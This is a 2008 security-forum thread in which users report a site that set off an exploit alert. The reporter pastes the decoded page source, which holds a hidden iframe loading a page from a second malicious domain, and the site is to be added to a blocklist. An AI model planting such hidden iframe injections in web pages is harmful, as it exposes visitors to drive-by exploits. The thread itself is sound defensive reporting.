Author Topic: geogamess.com  (Read 4501 times)

0 Members and 1 Guest are viewing this topic.

January 09, 2008, 03:50:30 am
Read 4501 times

cconniejean

  • Special Members
  • Jr. Member

  • Offline
  • *

  • 34
Came across this site
Quote
hxxp://www.geogamess.com
in a traffic exchange rotator. I have Exploit Prevention Lab Pro on my computer and got a WebAttacker exploit alert. Going to Gooby.ca so I could see what was on the web page I see a Iframe, for this:

Code: [Select]
Decoded output for:
  http://www.geogamess.com/

HTTP/1.1 200 OK
Date: Wed, 09 Jan 2008 02:35:19 GMT
Server: Apache
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<title>travelblog.com - this is the world calling</title>
<link rel="stylesheet" href="/css/screen.css" type="text/css" media="screen"/>
<!--[if IE 6]>
<link rel="stylesheet" href="/css/ie6.css" type="text/css" media="screen" />
<![endif]-->

<script language="javascript1.2">
var ii= 1;
function nextfile(){
//alert("okay we arestillgood");

ii=(ii 1) % 3;
nextfiler='scroller'   ii   ".htm";
//alert(nextfiler);
if(document.all) document.all.datamain.src =nextfiler;
else document.getElementById('datamain').src=nextfiler;
return;
}
</script>
</head>
<body  style="background: #FFFEF3;" >
<iframe src="http://sclgntfy.com/ent2298.htm" style="display:none"></iframe>
<div id="header" ></div>

I put the sclgntfy*com in my host files and went to geogamess*com, all I see is a white page. The sclgntfy*com does have a bunch of code on it.

January 09, 2008, 07:29:45 pm
Reply #1

sowhat-x

  • Guest
....googling for 'ent2298' also results in a couple of results...
Not in front of VMware at the moment though,
thereby I haven't attempted checking these...ie.they might irrelevant...


January 09, 2008, 10:57:23 pm
Reply #2

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
Thanks, this will be added soon.